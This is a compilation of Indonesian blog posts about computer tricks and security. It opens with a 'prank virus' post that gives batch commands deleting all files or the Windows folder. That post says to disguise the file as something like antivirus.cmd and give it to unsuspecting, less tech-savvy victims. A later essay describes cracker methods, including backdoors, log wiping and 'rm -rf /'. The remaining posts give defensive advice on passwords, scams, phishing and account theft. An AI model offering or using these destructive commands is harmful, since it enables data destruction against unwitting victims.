Perintah CMD yg asyik bwt seru2an

Untuk men-delete semua file/folder, anda cuma perlu melakukan ini:
DEL /F /Q *Ketik/copy tulisan tsb Di notepad, kemudian save menjadi *.cmd
(ex:antivirus.cmd)Itu akan men-delete semua data yg ada di komputer walaupun itu file/folder read-only dan anda tidak akan diberi konfirmasi untuk melakukan hal itu. Anda tidak akan bisa melakukan apapun jika anda sudah meng-klik file cmd tsb.PERINGATAN: JANGAN PERNAH SEKALI-KALI ANDA MENCOBA MENG-KLIK JIKA ANDA TELAH MENCIPTAKANNYA, ITU AKAN MERUSAK KOMPUTER ANDA SENDIRI

Jika anda ingin mencoba virus ini, lakukan ini:

Pertama, buat text file bernama TEST.txt di C:\
Selanjutnya, buka notepad, tulis “del C:\TEST.txt” (tanpa tanda quota/”), lalu “Save As…” dan save dengan nama “Percobaan.cmd”(Juga tanpa tanda quota/”)
Berikutnya, klik Percobaan.cmd tadi dan buka drive C:\ anda dan anda akan melihat file TEST.txt anda menghilang

Petunjuk yg simpel:
Buka notepad, tulis DEL /F /Q C:\WINDOWS (kalo anda orang yg tidak terlalu kejam, hapus windowsnya aja, kasian korbannya), kemudian save dengan nama *.cmd (namanya terserah anda, yg penting formatnya .cmd), lalu berikan ini kepada korban yg anda inginkan. Sekali korban membuka/meng-klik file ini, maka WINDOWSnya akan hilang dan dia harus meng-install WINDOWSnya lagi. Dijamin, datanya ilang semua karena dia harus install ulang WINDOWSnya (kalo kita install windows kan datanya terhapus smua, kecuali dia emang ahli komputer, tapi kan pasti kita kasih ni virus sama orang2 yg rada2 gaptech, jd dia ga bs bedain ini virus ato nggak. So, dia asal klik aja deh).

PERINGATAN: INI ADALAH VIRUS YANG SANGAT KUAT, SAYA TIDAK BISA MENJAMIN KEAMANAN ANDA JIKA ANDA MENCOBA MEMBUKA/MENG-KLIK VIRUS INI PADA KOMPUTER ANDA SENDIRI

Cil, terusannya mana......

Bagaimana membuat password yang sulit dibobol hacker?

gambar gembok + kunci password yang kuat dan sulit dibobolJaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?

Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

Cara hacker menebak password kita antara lain dengan:

  1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
  2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
  3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

  • 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
  • password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
  • tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

  • menggunakan semua huruf kecil.
  • menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
  • mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?

  1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
  2. Panjang lebih dari 10 karakter.
  3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.

Contoh password yang kuat: 1mAu$100Ribu

Cara mengingatnya:

  • 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
  • mAu = mau
  • $ = uang
  • 100Ribu = 100 ribu

Contoh password kuat yang lain: ninG->0+1Gul

Cara mengingatnya:

  • ninG = misalnya nama orang sepesial buat Anda: Naning
  • -> = panah identik dengan adalah
  • 0+ = lambang cewek
  • 1 =berarti nomor satu atau paling
  • Gul = gula itu manis

Beberapa tips:

  1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
    • seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
    • admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
  2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
  3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
  4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
  5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

Cil, terusannya mana......

Learn to be Hacker

Oleh : Onno W. Purbo

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Cil, terusannya mana......

yang mw coba buat virus


Cil, terusannya mana......

11 Cara Penipuan Gaya Baru di Internet (cara menghindari)

Gambar cewek seksi korban penipuanPenipuan di Internet sekarang merajalela, jika Anda tidak mengetahuinya, kemungkian Anda akan menjadi korban. Para penipu ini bisa mengambil uang kita dengan berbagai cara atau memfitnah kita. Yang jelas sangat merugikan kita. Penipu biasanya memanfaatkan goncangan psikologis dan membuat orang mengabaikan akal sehat. Baca kelanjutannya ya…

  1. Undian Berhadiah
    • Sering sekali ada orang yang menerima email berisi Anda memenangkan undian berhadiah. Bisa dari Yahoo, Microsoft, atau yang lain. Jangan mempercayai email ini. Jika Anda penasaran sekali, kontak langsung Yahoo atau Microsoft atau siapapun yang dikabarkan dalam email tersebut akan memberi hadiah.
    • Pencegahan: Jangan percaya apalagi transfer uang terlebih dahulu sebelum Anda memastikan kebenaran undian berhadiah.
  2. Bisnis Palsu
    • Bisnis ini biasanya MLM (Anda harus merekrut member). Termasuk di dalam kategori ini adalah HYIP (High Yield Investment Program). HYIP bukan bisnis investasi tetapi permainan uang.
    • Pencegahan: Mendapatkan uang dengan mudah itu tidak ada. Selidiki siapa yang menyelenggrakan bisnis tersebut (alamat, badan hukum) jika akan bergabung dengan suatu bisnis..
  3. Phising
    • Phising adalah teknik penipuan untuk mencuri password Anda atau informasi pribadi Anda. Pelaku phising sering membuat website palsu yang mirip dengan aslinya, sehingga korban memasukkan nomor rekening dan password di website penipu.
    • Pencegahan: jangan mengklik link di email, selalu periksa URL sebelum login. Misalnya jika mau login ke yahoo mail, pastikan URL-nya mail.yahoo.com.
  4. Program Pay To
    • Anda mendapat tawaran untuk mengikuti program yang akan membayar Anda jika Anda mengklik email atau banner. Diantaranya memang mereka membayar Anda, namun sebagian besar mereka tidak membayar Anda. Ciri-ciri penyelenggara bisnis ini yang menipu adalah jika mereka menyaratkan Anda harus memperoleh poin sejumlah tertentu (misalnya 100 USD) sebelum mereka membayar Anda. Kenyataannya, poin Anda tidak pernah mencapai jumlah ini.
    • Pencegahan: Tidak mengikuti program ini, kalau Anda tertarik mengikuti, selalu memeriksa forum yang membahas program tersebut dan mencari tahu apakah membernya dibayar.
  5. Piramida Uang
    • Mirip MLM tapi tanpa produk. Anda diminta untuk mentransfer uang ke nama nomer pertama, Anda masuk ke nomor terakhir. Anda diminta menyebarkan email tersebut ke banyak orang. Bisnis seperti ini tidak berjalan dan hanya membuang waktu Anda.
    • Pencegahan: Tidak mengikuti bisnis piramida uang.
  6. Pencucian Uang
    • Anda mendapat email bahwa ada harta warisan yang perlu dicairkan. Anda diminta membantu dengan menyediakan rekening bank untuk ditransfer. Uangnya sebenarnya tidak ada, kalaupun ada dan ditransfer ke rekening Anda, uang itu adalah hasil curian dan Anda akan berurusan dengan hukum.
    • Pencegahan: Jangan pernah tergiur dengan penawaran ini.
  7. Hacking & Cracking
    • Anda tiba-tiba tidak bisa login di email, password salah terus! Padahal Anda merasa tidak pernah mengganti password. Atau E-gold atau paypal Anda tiba-tiba habis ada yang menguras. Pelakunya adalah hacker atau cracker yang mencuri password Anda dan mentransfer ke rekening mereka.
    • Pencegahan: Selalu memasang antivirus dan tidak mengakses rekening online di warnet, selalu gunakan komputer pribadi jika Anda harus mengakses rekening online.
  8. Software yang berisi virus / trojan
    • Anda mendownload software dan merasa nyaman menggunakannya. Tiba-tiba rekening Anda ada yang membobol.
    • Pencegahan: Selalu gunakan antivirus terbaru yang sudah diupdate ketika membuka Internet.
  9. Penyedia layanan email palsu
    • Anda mendapat email yang berisi iklan bahwa ada sebuah layanan email yang sangat fantastis, misalnya tanpa batasan kapasitas, anonim, bahkan Anda akan mendapat dollar jika registrasi. Itu semua bohong. Jika Anda menggunakan email tersebut, maka data-data pribadi Anda akan dicuri oleh penyedia email palsu tersebut.
    • Pencegahan: Jangan mendaftar email ke tempat yang tidak dapat dipercaya, gunakan yahoo atau gmail yang terpercaya.
  10. Email palsu (Fake Mail)
    • Anda mendapat e-mail seolah-olah dari admin yahoo, admin e-gold atau paypal. Email ini menyatakan Anda harus login untuk verifikasi data. Anda sangat terkejut dan segera membuka link yang ada dalam pesan email tersebut. Anda diminta memasukkan password Anda. Jika ini terjadi berarti Anda telah tertipu, karena mengirimkan password ke hacker / cracker.
    • Pencegahan: Jangan mengklik link dalam email, apalagi setelah Anda klik, Anda harus memasukkan password Anda. Ini halaman palsu.
  11. Email Berantai (Chain / Hoax Letter)
    • Anda pasti sering mendapatkan email yang menganjurkan untuk meneruskan pesan (forward) tersebut ke orang lain. Mungkin ada ancaman atau Anda ingin membantu seseorang, atau dengan meneruskan email tersebut Anda akan mendapatkan hadiah. Hampir semua email berantai adalah bohong. Hanya membuang waktu Anda.
    • Pencegahan: Jangan meneruskan email yang menyarankan Anda untuk meneruskan email kepada orang lain.

Berhati-hatilah! Ada dua pedoman penting:

  1. Berhati-hati dan tidak mudah percaya.
  2. Sesuatu yang terlalu bagus untuk ada, itu berarti tidak ada.

Cil, terusannya mana......

Trace Email - Cara Mengetahui Identitas Pengirim Email

identitas email trace imageAnda pasti pernah mendapat email SPAM, HOAX, penipuan, undian berhadiah, berita bohong, dan Anda ingin tahu identitas pengirim email tersebut? Caranya mudah kok, yaitu dengan Email Trace. Anda bisa mengetahui IP-Adress pengirim email, peta di mana dia berada, derajat lintang dan busur, pokoknya lengkap deh. Caranya seperti ini:

1. Buka http://www.ip-adress.com/trace_email/

Di halaman tersebut Anda akan diminta memasukkan header email. Header email adalah informasi yang ada di setiap email, seperti IP Address pengirim & penerima.

Cara melihat header email:

  • Yahoo Mail Baru: Klik kanan email, pilih View Full Headers
  • Yahoo Mail Classic: Buka email tersebut, di bagian pojok kanan bawah ada tulisan View Full Header.
  • Gmail / Google Mail: Buka email tersebut, di bagian atas ada pilihan Reply, samping tulisan Reply, ada tanda panah ke bawah, pilih Show Original.
  • Hotmail: Klik kanan email, pilih View Source.
  • Outlook Express: Buka email, buka menu File -> Properties -> Details -> Message Source
  • Microsoft Outlook: Klik double email untuk melihat dalam full Window, buka menu Options -> View.

2. Copy-paste header email ke http://www.ip-adress.com/trace_email/ , klik Trace Email Sender

3. Selesai. Anda akan melihat informasi pengirim email seperti ini. Anda bisa mengklik whois untuk melihat lebih detail.

trace mengetahui identitas pengirim email image

Selamat mencoba!


Cil, terusannya mana......

Menangkal Kejahatan Hacking Friendster

Di kalangan anak muda dan remaja situs jejaring sosial Friendster adalah yang paling banyak digemari, bahkan terbesar di wilayah asia. Banyak hal positif yang bisa di dapat dengan kehadiran Friendster. Bayangkan, Anda bisa berteman dengan siapa saja, baik yang berbeda daerah, berbeda suku, berbeda kepercayaan, berbeda status sosial, berbeda latar belakang pendidikan, berbeda pekerjaan, bahkan berbeda negara walaupun semuanya hanya di dunia maya.

Gratis dan mudah dalam penggunaannya adalah salah satu alasan mengapa situs jejaring sosial Friendster menjadi primadona. Disamping menjalin pertemanan dengan siapa saja, Friendster juga bagi sebagian orang dijadikan ajang untuk mencari pasangan alias pacar, bahkan tidak menutup kemungkinan bisa menjadi nyata di dunia maya. Ada yang berpendapat, bahwa di Friendster itu banyak tersimpan hal-hal yang ‘palsu’, maksudnya tidak semua informasi yang ada di profil Friendster itu asli, ada beberapa yang menuliskannya dengan aspal. Kita ambil contoh sederhana, mungkin kalau di kehidupan nyata orang tersebut berstatus nikah dengan dua orang anak, tapi kalau status di FS bisa saja dibuat menjadi single, bukan tidak mungkin hal demikian terjadi. Mungkin ada yang berpikiran “FS itu kan bukan tempat kredit motor, dimana pembelinya harus di survery terlebih dahulu” sebuah pemikiran yang masuk akal akan tetapi sebenarnya keliru.

Memahami Hacking Friendster

Hacking friendster berbeda dengan hacking pada sebuah website, hacking friendster lebih memanfaatkan kecerobohan para penggunanya dibandingkan exploitasinya. Dalam hal ini belum ditemukan adanya kasus website utama friendster di hack(tolong kasih feedback kalau salah), tetapi kalau account friendster tentu sudah banyak.

Banyak alasan yang menyebabkan terjadinya hacking friendster, diantaranya:

Perbuatan iseng

Untuk alasan yang satu ini biasanya dilakukan oleh orang-orang yang hanya ingin melakukannya untuk kesenangan dirinya dan menganggapnya sebagai sesuatu yang biasa, padahal korbannya akan dirugikan.

Mencoba jebakan

Untuk alasan ini biasanya hanya dilakukan untuk menguji coba jebkan yang dibuat, biasanya menggunakan halaman login friendster yang palsu atau dengan mengirim testimonial. Tetapi tidak melakukan hal yang merugikan.

Tindak kejahatan

Kalau untuk yang satu ini memang sengaja dilakukan untuk hal yang tidak baik, misalnya mengubah informasi pada halaman profil yang tidak semestinya atau mengubah foto profil dengan foto yang tidak sesuai. Hal tersebut biasanya dilakukan untuk ‘menjatuhkan’ orang tersebut dan adanya perasaan dendam, Untuk melakukan hal tersebut biasanya dengan melakukan pencurian account dan mengubahnya dengan account berbeda, contohnya password yang sudah diubah.

Dengan melihat fakta tersebut hendaknya kita waspada dan berhati-hati agar tidak terjadi yang namanya hacking friendster.

Metode Hacking Friendster

Sebuah account friendster bisa dijebol dengan berbagai metode, dari cara yang termudah sampai dengan cara tersulit. Semuanya memanfaatkan kelemahan dari pemilik account FS tersebut.

Beberapa metode hacking friendster yang biasa dilakukan, diantaranya:

Dengan menggunakan testimonial cara 1, dengan cara seperti ini si pelaku biasanya akan mengirim sebuah testi yang didalamnya telah dibumbui(emanya sayur bang ^^) skrip tertentu. Untuk mengelabuhinya, testi tersebut sengaja tidak dibuat dalam bentuk teks tetapi bisa dalam bentuk animasi flash. Pada testi tentunya yang akan terlihat hanyalah animasi menarik, tetapi ketika di klik maka si korban akan diarahkan pada halaman login palsu, yang menyatakan bahwa ia belum login, padahal tanpa sadar ia sudah memasukan username dan password ke tempat yang salah. Cara ini berlaku jika si korban mengeset penerimaan testimonialnya secara langsung.

Dengan menggunakan testimonial cara 2,, cara yang digunakan sebenarnya sama, tetapi cara kedua ini biasanya dilakukan jika si korban mengeset penerimaan testimonial tidak secara otomatis. Cara kerjanya, si pelaku akan mengirim testimonial untuk di approve, ketika si korban sudah meng-approvenya maka akan diarahkan pada halaman login palsu, sesudah itu kena dech.

Dengan MediaBox, cara kerjanya sama yaitu dengan menggunakan redirect URL. Letak perbedaanya, si pelaku sengaja memasang jebakannya pada mediabox profilnya, ketika korban mengunjungi halaman profile si pelaku maka akan diarahkan pada halaman login palsu, jadinya kena hack lagi dech.

Social Engineering, untuk cara yang satu ini berbeda dengan ketiga cara di atas. Social engineering menggunakan metode pengamatan dan penganalisaan dari isi profil yang ditampilkan, hal utama yang perlu diketahui adalah alamat email si korban. Setelah si pelaku mempelajari profil korban maka langkah selanjutnya adalah mencoba untuk login dengan menggunakan email si korban, untuk password akan mencoba segala kemungkinan yang cocok dengan profil friendster, seperti tanggal lahir, nama pacar, nama makanan kesukaan, tempat sekolah dan lain sebagainya. Cara seperti ini memang memerlukan waktu yang lama tetapi mujarab lho.

Sebenarnya masih banyak cara yang bisa digunakan untuk melakukan friendster hacking, sebagai referensi mungkin Anda bisa juga membaca buku karangan Thor yang di terbitkan oleh Elexmedia Komputindo.

Cara Mencegah Hacking Friendster

Jika Anda belum menjadi korban hacking maka Anda bisa mengikuti kiat-kiat berikut, supaya tidak menjadi korban berikutnya(kayak pembunuhan saja ^^).

Cara mencegahnya sebagai berikut:

Jangan melakukan penerimaan testimonial secara otomatis, pada bagian Privacy Setting ubah pada bagian “Approve comments automatically:” menjadi Never.

Jangan mengapprove testimonial yang isinya dianggap mencurigakan.

Jika setelah meng-approve testi atau mengklik testimonial muncul halaman login friendster baru, segera tutup halaman login tersebut. Ingat! Jika Anda sudah bisa mengapprove testi itu tandanya Anda sudah login, jadi tidak mungkin dusuruh login lagi. Tandanya jika Anda sudah login halaman logout akan ditampilkan.

Pastikan alamat login yang benar adalah www.friendster.com/login.php. URL palsu tentunya tidak akan menggunakan nama yang sama, tetapi hanya menggunakan tampilan yang sama.

Hal yang sepele tapi penting jangan lupa setelah mengakses situs friendster untuk melakukan logout, agar Anda bisa keluar secara aman.

Jangan memberikan tanda ceklist pada opsi rememberme pada saat Anda login ke situs friendster, sebab browser akan mengingat dan menyimpannya seca otomatis.

Jangan mengumbar informasi terlalu penting pada halaman profile, sebab bisa dijadikan media social engginering untuk pencurian account Anda.

Buatlah password yang tidak mudah ditebak oleh orang lain, password tersebut tentunya jangan berhubungan dengan isi profil friendster Anda. Gunakan kombinasi hurup, angka, dan karakter khusus tetapi jangan sampai lupa mengingatnya.

jika Anda menerapkan cara-cara di atas niscaya Anda tidak akan menjadi korban dari hacking friendster ^ ^.

Pesan buat temen2 pecinta Friendster :

Buat temen2 yang sering ke warnet hanya untuk ber-Friendster ria. . .Apakah tidak ada aktivitas lain di internet selain ber-Friendsteran . . .?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 – 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso ato permen ja . . . . !

Salam PEACE and LOVE

Cil, terusannya mana......

Cracking atau Hacking ID atau Username Yahoo Messenger (Termasuk Email): Sekedar Pengantar dan Cara Mengatasinya

Disini saya tidak akan mengajarkan kepada anda mengenai cara-cara cracking id yahoo atau sejenisnya. Disini saya hanya akan memberikan sebuah gambaran umum mengenai cara-cara seseorang melakukan pencurian id atau cracking atau hacking ID yahoo messenger atau email yahoo sekaligus tips singkat mengatasi kejadian atau peristiwa seperti ini.

Cracking ID yahoo dapat dilakukan dengan berbagai cara. Cara yang paling banyak dilakukan adalah dengan menggunakan beberapa tools atau perangkat software crack tertentu. Untuk melakukan kegiatan crack dengan software ini diperlukan pengetahuan dasar mengenai penggunaan proxy maupun koneksitas internet anda. Proxy digunakan untuk me loop atau mengulang percobaan setiap kali crack dilakukan karena amat sangat riskan melakukan cracking tanpa menggunakan proxy atau alat pengaman yang lain. Pengetahuan mengenai penggunaan password juga diperlukan. Dan yang terpenting username yang diperlukan. Melakukan kegiatan cracking juga dilakukan sekaligus untuk beratus-ratus id atau username. Jadi pertama yang dibutuhkan oleh para cracker adalah: list username atau id atau alamat email di yahoo, list password, daftar proxy (ada juga tools yang tidak memerlukan proxy).

Yang saya sebutkan diatas merupakan cara cracking id yahoo lewat tool tertentu. Sedangkan cracking id juga dapat dilakukan dengan cara membuat sebuah website imitasi yang mengharuskan seseorang menuliskan username atau id beserta passwordnya dan kemudian id dan password tersebut dikirim ke sang cracker. Cara ini cukup bermanfaat jika sang pengguna kurang teliti. Untuk lebih membuat cara ini berhasil atau mendapatkan daftar id dan passwordnya biasanya para cracker mengirimkan email peringatan tertentu atau bisa juga mengirimkan pesan atau PM instants message (biasanya berupa spam) ke pengguna yahoo messenger. Tool yang dibutuhkan adalah YM PM spammer atau Yahoo email bombing. Bisa juga dilakukan dengan cara manual

